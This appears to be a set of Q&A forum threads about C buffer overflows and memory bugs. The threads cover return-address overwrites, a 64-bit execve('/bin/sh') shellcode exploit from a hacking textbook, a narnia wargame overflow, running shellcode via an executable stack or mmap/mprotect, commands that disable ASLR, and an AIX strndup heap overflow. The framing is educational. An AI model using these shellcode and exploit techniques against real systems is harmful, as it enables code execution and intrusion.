For educational purposes I'm trying to accomplish a buffer overflow that redirects the program to a different address.
This is the C program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void secret1(void) {
    puts("You found the secret function No. 1!\n");
}

int main(void) {
    char string[2];
    puts("Input: ");
    scanf("%s", string);
    printf("You entered %s.\n", string);
    return 0;
}
I used gdb to find the address of secret1, as well as the offset from my variable string to the saved return address (RIP). Using this information I created the following Python exploit:
import struct
rip = 0x0000000100000e40
print("A"*24 + struct.pack("<q", rip))
So far everything works - the program jumps to secret1 and then crashes with "Segmentation fault".
HOWEVER, if I extend my program like this:
...
void secret1(void) {
puts("You found the secret function No. 1!\n");
}
void secret2(void) {
puts("You found the secret function No. 2!\n");
}
void secret3(void) {
puts("You found the secret function No. 3!\n");
}
...
...it segfaults WITHOUT jumping to any of the functions, even though the new fake RIPs are correct (i.e. 0x0000000100000d6c for secret1, 0x0000000100000d7e for secret2). The offsets stay the same, as far as gdb told me (or don't they?).
I noticed that none of my attempts work when the program is "big enough" for the secret functions to be placed in the memory area with addresses like 0x100000d.. - it works like a charm, though, when they end up somewhere in 0x100000e..
It also works with more than one secret function when I compile it in 32-bit mode (addresses changed accordingly), but not in 64-bit mode.
Compiling with -fno-stack-protector doesn't make any difference.
Can anybody please explain this odd behaviour to me? Thank you soooo much!
Perhaps creating multiple hidden functions puts them all in a page of memory without execute permission; try explicitly giving RWX permission to that page using mprotect. It could be a number of other things, but this is the first issue I would address.
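A minimal sketch of that suggestion, called from inside the target program itself (unprotect_page is an illustrative name, and whether the OS actually permits adding write+execute to a text page is another matter):

#include <sys/mman.h>
#include <stdint.h>
#include <unistd.h>

void secret1(void);  /* the target function from the program above */

/* Mark the page containing secret1 readable/writable/executable. */
static void unprotect_page(void) {
    uintptr_t pagesize = (uintptr_t)sysconf(_SC_PAGESIZE);
    uintptr_t page = (uintptr_t)secret1 & ~(pagesize - 1);
    mprotect((void *)page, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC);
}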
As for the -fno-stack-protector gcc option: for a while I was convinced it was being ignored on gcc 4.2.1, but after playing with it a bit more, I learned that for canary stack protection to be enabled at all, sizeof(buffer) >= 8 must be true. Additionally, it must be a char buffer, unless you specify the -fstack-protector-all or -fno-stack-protector-all options, which enable (or disable) canaries even for functions that don't contain char buffers. I'm running OS X 10.6.5 64-bit with the aforementioned gcc version, and in a buffer overflow exploit snippet I'm writing, my stack changes when compiling with -fstack-protector-all versus compiling with no relevant options (probably because the function being exploited doesn't have a char buffer). So if you want to be certain that this feature is either disabled or enabled, make sure to use the -all variants of the options.
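One way to check what the compiler actually emitted, rather than trusting the flags: compile a tiny probe with each option and diff the assembly. A sketch:

/* probe.c -- compile twice and compare:
 *   gcc -S -fstack-protector-all probe.c -o with.s
 *   gcc -S -fno-stack-protector probe.c -o without.s
 * The protected version references the stack-check guard symbols
 * (__stack_chk_guard / __stack_chk_fail, with an extra leading
 * underscore on OS X). */
void probe(void) {
    char buf[4];   /* below the 8-byte threshold mentioned above */
    buf[0] = 0;
}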
I am reading the book "Hacking: The Art of Exploitation" and I have some problems with the code of exploit_notesearch_env.c. It attempts a buffer overflow exploit by calling the program to be exploited with the execle() function, so that the only environment variable of the program to be exploited will be the shellcode.
My problem is that I can't figure the address of the shellcode environment variable out. The book says that the base address was 0xbffffffa and then subtracts the size of the shellcode and the length of the program name from it to obtain the shellcode address.
This is the code of exploit_notesearch_env.c which calls the notesearch program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>

char shellcode[] =
    "SHELLCODE=\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";

int main(int argc, char *argv[]) {
    char *env[2] = {shellcode, (char *) 0};
    uint64_t i, ret;
    char *buffer = (char *) malloc(160);

    ret = 0xbffffffa - (sizeof(shellcode)-1) - strlen("./notesearch");
    memset(buffer, '\x90', 120);
    *((uint64_t *)(buffer+120)) = ret;
    execle("./notesearch", "notesearch", buffer, (char *) 0, env);
    free(buffer);
}
By the way, the book uses a 32-bit Linux distro while I am using Kali Linux 2019.4 64-bit, which might be the origin of the problem.
The shellcode is already adjusted for 64 bits and the program correctly overflows the buffer, but with the wrong address.
Does anyone know the right substitute for the address 0xbffffffa from the book?
What is the base address of a C program's environment when started with the execle call?
Impossible to say.
Does anyone know the right substitute for the address 0xbffffffa from the book?
No, nobody knows except your operating system.
First of all, on modern Linux systems, Address Space Layout Randomization (ASLR) is usually enabled by default. This means that every program you run will have different randomized base addresses for the stack, the heap, the binary itself and any other library or virtual memory page.
This randomization is done by the kernel itself. To disable ASLR, you can start the program under GDB (which disables it only for the process it starts), or you can temporarily disable it system-wide with the sysctl command, setting kernel.randomize_va_space to 0 for no ASLR and to 2 for normal ASLR.
sudo sysctl -w kernel.randomize_va_space=0 # disabled
sudo sysctl -w kernel.randomize_va_space=2 # enabled
However, even after disabling ASLR, it's still not possible to know the position of the stack beforehand; you will have to run your program under GDB at least once to check the address first (environment variables are at the bottom of the stack). There really is no other way, other than writing your own linker script, which is not that simple.
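For that check, one approach (a sketch, not part of the original answer; the variable name SHELLCODE matches the exploit above) is a tiny helper that prints where the variable ended up. Keep in mind the exact address shifts slightly with the program name and environment size, which is exactly why the book subtracts the shellcode size and the program name length:

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    char *addr = getenv("SHELLCODE");
    if (addr == NULL) {
        fprintf(stderr, "SHELLCODE is not set\n");
        return 1;
    }
    printf("SHELLCODE found at %p\n", (void *)addr);
    return 0;
}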
If your book did not cover these concepts before, then I strongly suggest you find another book, because jumping right into the code without explaining anything first doesn't make much sense.
This is the C code that I am compiling:
#include <stdio.h>
#include <stdlib.h>

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef)
        system("/bin/sh");
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }
    return 0;
}
Here, I am expecting an overflow into long val if the user inputs a string 24 characters long, changing the value in val. But it just doesn't get overflowed, even if the string is long enough. Can someone please explain this behaviour?
I am on macOS. This is what gcc -v spits out:
Configured with: --prefix=/Applications/Xcode.app/Contents/Developer/usr --with-gxx-include-dir=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.12.sdk/usr/include/c++/4.2.1
Apple LLVM version 8.0.0 (clang-800.0.42.1)
Target: x86_64-apple-darwin16.0.0
Thread model: posix
InstalledDir: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin
Also, after googling a bit I tried gcc with these flags:
gcc -g -fno-stack-protector -D_FORTIFY_SOURCE=0 -o overflow_example overflow_example.c
Still, the result is the same.
This code is part of narnia wargame challenge on overthewire. I managed to crack this challenge on their remote shell, where it was behaving as expected. Now, I am trying to reproduce this same challenge on my local system and facing this issue. Please help.
EDIT: For all the people yelling out about UB: like I said, this was one of the challenges to be solved on OverTheWire, so it cannot have UB. There are some blogs (here's one I found) that provide a walkthrough for this challenge with a reasonable logical explanation for why the code behaves the way it does, with which I agree. I also understand that the compiled binary is platform-dependent. So, what am I to do to produce this binary with the potential overflow on my local system?
It's undefined behavior because C functions do not check whether an argument is too big for its buffer.
Apparently the variables get laid out differently on the stack on your Mac.
Wrapping them in a struct will ensure that they are placed in the order you want.
Since there is the possibility of padding, let's turn it off. For gcc, the preprocessor directive #pragma pack controls struct packing. (Note that a struct member cannot be initialized inside the struct definition in C, so val is assigned after the declaration below.)
#include <stdio.h>
#include <stdlib.h>

int main(){
#pragma pack(1)
    struct {
        char buf[20];   /* buf first, so the overflow runs into val */
        long val;
    } s;
#pragma pack()
    s.val = 0x41414141;

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s", s.buf);

    printf("buf: %s\n", s.buf);
    printf("val: 0x%08lx\n", s.val);

    if(s.val == 0xdeadbeef)
        system("/bin/sh");
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }
    return 0;
}
I'm not sure what you mean.
1) Are you concerned that your input string will create a number too big to store in a long? This will not happen; the number will simply wrap around.
2) Are you concerned that you'll write to memory beyond the bounds of buf? In C this will produce undefined behavior, not necessarily a crash.
buf is on the stack (it could just as well be on the heap), so you can just keep writing to memory from the address where buf starts. The compiler will generate code that will not do a bounds check for you. So if you go beyond the 20 bytes, you'll eventually start overwriting other parts of memory that do not belong to the block you've set aside for buf.
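To see how the variables actually got laid out in your build, a quick diagnostic sketch of the same locals: print their addresses; if val sits below buf, writing past buf can never reach it.

#include <stdio.h>

int main(void) {
    long val = 0x41414141;
    char buf[20];
    /* If &val is below buf in memory, overflowing buf cannot touch val. */
    printf("buf at %p, val at %p\n", (void *)buf, (void *)&val);
    return 0;
}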
I have downloaded and compiled Apple's source and added it to Xcode.app/Contents/Developer/usr/bin/include/c++/v1. Now how do I go about implementing it in C? The code I am working with is from this post about Hackaday's shellcode executor. My code is currently like so:
#include <stdio.h>
#include <stdlib.h>

unsigned char shellcode[] = "\x31\xFA......";

int main()
{
    int *ret;
    ret = (int *)&ret + 2;       /* point at the saved return address */
    (*ret) = (int)shellcode;     /* overwrite it with the shellcode's address */
    printf("2\n");
}
I have compiled with both:
gcc -fno-stack-protector shell.c
clang -fno-stack-protector shell.c
I guess my final question is, how do I tell the compiler to implement "__enable_execute_stack"?
The stack protector is different from an executable stack: the stack protector introduces canaries to detect when the stack has been corrupted.
To get an executable stack, you have to tell the linker to use an executable stack. It goes without saying that this is a bad idea, as it makes attacks easier.
The option for the linker is -allow_stack_execute, which turns into the gcc/clang command line:
clang -Wl,-allow_stack_execute -fno-stack-protector shell.c
Your code, however, does not try to execute code on the stack; it attempts to change a small amount of the stack content, trying to accomplish a return to the shellcode, which is one of the most common return-redirection (ROP-style) attacks.
On a typically compiled 32-bit OS X environment, this would be attempting to overwrite what is called the linkage area (the address of the next instruction to execute upon function return). This assumes that the code was not compiled with -fomit-frame-pointer; if it was, then you're actually moving one extra address up.
On 64-bit OS X, which uses the 64-bit ABI, the registers are 64-bit and all the values would need to be referenced as long rather than int, but the approach is similar.
The shellcode you've got there, though, is actually in the data segment of your program (because it's a char[], it is readable/writable, not readable/executable). You would need to either mmap it (like nneonneo's answer) or copy it into the now-executable stack, get its address, and call it that way.
However, if you're just trying to get code to run, then nneonneo's answer makes it pretty easy; if you're trying to experiment with exploit-y code, you're going to have to do a little more work. Because of the non-executable stack, the new kids use return-to-library mechanisms, trying to get the return to call, say, one of the exec/system calls with data from the stack.
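For the copy-to-stack variant mentioned above, a rough sketch (assuming the binary was linked with -Wl,-allow_stack_execute as described earlier, and that the shellcode fits the buffer; run_from_stack is an illustrative name):

#include <string.h>

extern unsigned char shellcode[];   /* the array from the question */

void run_from_stack(size_t len) {
    unsigned char buf[256];          /* assumes len <= sizeof buf */
    memcpy(buf, shellcode, len);
    ((void (*)(void))buf)();         /* jump to the stack copy */
}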
With modern execution protections in place, it's a bit tricky to get shellcode to run like this. Note that your code is not attempting to execute code on the stack; rather, it is storing the address of the shellcode on the stack, and the actual code is in the program's data segment.
You've got a couple options to make it work:
Put the shellcode in an actual executable section, so it is executable code. You can do this with __attribute__((section("name"))) with GCC and Clang. On OS X:
const char code[] __attribute__((section("__TEXT,__text"))) = "...";
followed by a
((void (*)(void))code)();
works great. On Linux, use the section name ".text" instead.
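Putting option 1 together into a self-contained sketch (the single 0xc3 byte is a harmless x86 "ret" standing in for real shellcode):

#include <stdio.h>

/* Placed in the executable __TEXT,__text section (OS X section names). */
const char code[] __attribute__((section("__TEXT,__text"))) =
    "\xc3";   /* x86 "ret": returns immediately when called */

int main(void) {
    ((void (*)(void))code)();
    puts("returned from injected code");
    return 0;
}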
Use mmap to create a read-write section of memory, copy your shellcode, then mprotect it so it has read-execute permissions, then execute it. This is how modern JITs execute dynamically-generated code. An example:
#include <sys/mman.h>
#include <string.h>
#include <unistd.h>

void execute_code(const void *code, size_t codesize) {
    /* round the size up to a whole number of pages */
    size_t pagesize = (size_t)sysconf(_SC_PAGESIZE);
    size_t size = (codesize + pagesize - 1) & ~(pagesize - 1);
    void *chunk = mmap(NULL, size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0);
    if(chunk == MAP_FAILED) return;
    memcpy(chunk, code, codesize);
    mprotect(chunk, size, PROT_READ|PROT_EXEC);
    ((void (*)(void))chunk)();   /* jump to the copied code */
    munmap(chunk, size);
}
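Usage with the shellcode array from the question would then be, for instance:

execute_code(shellcode, sizeof shellcode - 1);   /* -1 drops the string's trailing NUL */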
Neither of these methods requires you to specify any special compiler flags, and neither requires fiddling with the saved EIP on the stack.
I have a programming problem for which I would like to declare a 256x256 array in C. Unfortunately, each time I try to even declare an array of that size (of integers) and run my program, it terminates unexpectedly. Any suggestions? I haven't tried memory allocation since I cannot seem to understand how it works with multi-dimensional arrays (feel free to guide me through it, though; I am new to C). Another interesting thing to note is that I can declare a 248x248 array in C without any problems, but no larger.
dims = 256;
int majormatrix[dims][dims];
Compiled with:
gcc -msse2 -O3 -march=pentium4 -malign-double -funroll-loops -pipe -fomit-frame-pointer -W -Wall -o "SkyFall.exe" "SkyFall.c"
I am using SciTE 323 (not sure how to check GCC version).
There are three places where you can allocate an array in C:
In the automatic memory (commonly referred to as "on the stack")
In the dynamic memory (malloc/free), or
In the static memory (static keyword / global space).
Only the automatic memory has somewhat severe constraints on the amount of allocation (that is, in addition to the limits set by the operating system); dynamic and static allocations could potentially grab nearly as much space as is made available to your process by the operating system.
The simplest way to see if this is the case is to move the declaration outside your function, which places the array in static memory. If the crashes continue, they have nothing to do with the size of your array.
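Since the question mentions not knowing how dynamic allocation works for multi-dimensional arrays, here is a minimal sketch of both alternatives (identifier names are illustrative):

#include <stdlib.h>

#define DIMS 256

/* Option 1: static storage -- not limited by the stack size. */
static int majormatrix_static[DIMS][DIMS];

int main(void) {
    /* Option 2: one dynamic block, still indexable as matrix[i][j]. */
    int (*majormatrix)[DIMS] = malloc(sizeof(int[DIMS][DIMS]));
    if (majormatrix == NULL)
        return 1;

    majormatrix_static[0][0] = 1;
    majormatrix[10][20] = 42;

    free(majormatrix);
    return 0;
}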
Unless you're running a very old machine/compiler, there's no reason that should be too large. It seems to me the problem is elsewhere. Try the following code and tell me if it works:
#include <stdio.h>

int main()
{
    int ints[256][256], i, j;
    i = j = 0;
    while (i < 256) {
        while (j < 256) {
            ints[i][j] = i*j;
            j++;
        }
        i++;
        j = 0;
    }
    printf("Made it :) \n");
    return 0;
}
You can't just assume that "terminates unexpectedly" is directly caused by "declaring a 256x256 array".
SUGGESTION:
1) Boil your code down to a simple, standalone example.
2) Run it in the debugger.
3) When it "terminates unexpectedly", use the debugger to get a stack traceback; you must identify the specific line that's failing (see the sketch after this list).
4) Also look for a specific error message (if possible).
5) Post your code, the error message and your traceback.
6) Be sure to tell us what platform (e.g. CentOS Linux 5.5) and compiler (e.g. gcc 4.2.1) you're using, too.
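For steps 2 and 3, a minimal session might look like this (assuming gcc and gdb are available; note that the -fomit-frame-pointer flag from your compile line can make backtraces harder to read, so consider dropping it while debugging):

$ gcc -g -o SkyFall SkyFall.c
$ gdb ./SkyFall
(gdb) run
(gdb) backtrace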
I have seen strange behavior with the "strndup" call on AIX 5.3 and 6.1.
If I call strndup with a size larger than the length of the actual source string, then there is stack corruption after that call.
Following is sample code where this issue can occur:
int main ()
{
    char *dst_str = NULL;
    char src_str[1023] = "sample string";

    dst_str = strndup(src_str, sizeof(src_str));
    free(dst_str);
    return 0;
}
Has anybody else experienced this behavior? If yes, please let me know.
As per my observation, there must be an OS patch where this issue got fixed, but I could not find such a patch, if there is one at all. Please throw some light.
Thanks & Regards,
Thumbeti
You are missing a #include <string.h> in your code. Please try that; I am fairly sure it will work. The reason is that without the #include <string.h>, there is no prototype for strndup() in scope, so the compiler assumes that strndup() returns an int and takes an unspecified number of parameters. That is obviously wrong. (I am assuming you're compiling in POSIX-compliant mode, so strndup() is available to you.)
For this reason, it is always useful to compile code with warnings enabled.
If your problem persists even after the change, there might be a bug.
Edit: It looks like there might be a problem with strndup() on AIX: the issue seems to be a broken strnlen() function. If you see the problem even after adding #include <string.h>, it is likely you're hitting that bug. A Google search turns up a long list of results about it.
Edit 2:
Can you please try the following program and post the results?
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

int main(void)
{
    char *test1 = "abcdefghijabcdefghijabcdefghijk";
    char *test2 = "012345678901234567890123456789";
    char *control = "01234567890123456789012345678";
    char *verify;

    free(strndup(test1, 30));
    verify = strndup(test2, 29); /* shorter than the first strndup! */
    fprintf(stderr, ">%s<\n", verify);
    if (strcmp(control, verify))
        printf("strndup is broken\n");
}
(Taken from https://bugzilla.samba.org/show_bug.cgi?id=1097#c10.)
Edit 3: After seeing your output, which is >01234567890123456789012345678< with no "strndup is broken" message, I don't think your version of AIX has the strndup bug.
Most likely you are corrupting memory somewhere (given the fact that the problem only appears in a large program, under certain conditions). Can you make a small, complete, compilable example that exhibits the stack corruption problem? Otherwise, you will have to debug your memory allocation/deallocation in your program. There are many programs to help you do that, such as valgrind, glibc mcheck, dmalloc, electricfence, etc.
Old topic, but I have experienced this issue as well. A simple test program on AIX 6.1, in conjunction with AIX's MALLOCDEBUG, confirms the issue.
#include <string.h>

int main(void)
{
    char test[32] = "1234";
    char *newbuf = NULL;
    newbuf = strndup(test, sizeof(test)-1);
}
Compile and run the program with buffer overflow detection:
~$ gcc -g test_strndup2.c
~$ MALLOCDEBUG=catch_overflow ./a.out
Segmentation fault (core dumped)
Now run dbx to analyze the core:
~$ dbx ./a.out /var/Corefiles/core.6225952.22190412
Type 'help' for help.
[using memory image in /var/Corefiles/core.6225952.22190412]
reading symbolic information ...
Segmentation fault in strncpy at 0xd0139efc
0xd0139efc (strncpy+0xdc) 9cc50001 stbu r6,0x1(r5)
(dbx) where
strncpy() at 0xd0139efc
strndup#AF5_3(??, ??) at 0xd03f3f34
main(), line 8 in "test_strndup2.c"
Tracing through the instructions in strndup, it appears that it mallocs a buffer just large enough to hold the string in s plus a NUL terminator. However, it always copies n characters to the new buffer, padding with zeros if necessary, causing a buffer overflow whenever strlen(s) < n.
/* Reconstruction of AIX's broken strndup: */
char* strndup(const char *s, size_t n)
{
    /* the allocation is sized from the actual string length... */
    char* newbuf = (char*)malloc(strnlen(s, n) + 1);
    /* ...but the copy pads out to n-1 bytes, overflowing the buffer
       whenever strlen(s) < n */
    strncpy(newbuf, s, n-1);
    return newbuf;
}
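For contrast, a conforming implementation would write at most len + 1 bytes into the allocation; a sketch (strnlen is POSIX.1-2008):

#include <string.h>
#include <stdlib.h>

char *strndup_fixed(const char *s, size_t n)
{
    size_t len = strnlen(s, n);   /* at most n, stops at the NUL */
    char *newbuf = malloc(len + 1);
    if (newbuf == NULL)
        return NULL;
    memcpy(newbuf, s, len);
    newbuf[len] = '\0';
    return newbuf;
}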
Alok is right. And with the gcc toolchain under glibc, you would need to define _GNU_SOURCE to get the declaration of strndup; otherwise it's not declared, e.g.:
#include <string.h>
...
Compile with:
gcc -D_GNU_SOURCE a.c
Thanks a lot for your prompt responses.
I have tried the given program.
Following is the result:
bash-2.05b# ./mystrndup3
>01234567890123456789012345678<
In my program I have included <string.h>, yet the problem persists.
Following is the strndup declaration in the preprocessed code:
extern char * strndup(const char *, size_t);
I would like to clarify one thing: with the small program I don't see the stack corruption effect. It appears consistently in my product, which has a huge number of function calls.
Using strndup in the following way solved the problem:
dst_str = strndup(src_str, strlen(src_str));
Please note: I used strlen instead of sizeof, as I need only the valid string.
I am trying to understand why it is happening.
The behavior I see in my product when I use strndup with a large size:
At the "exit" of main, execution cores with "Illegal Instruction".
Intermittently, "Illegal Instruction" in the middle of execution (after the strndup call).
Corruption of some allocated memory, which is nowhere related to strndup.
All these issues are resolved by just calling strndup with the actual size of the source string.
Thanks & Regards,
Thumbeti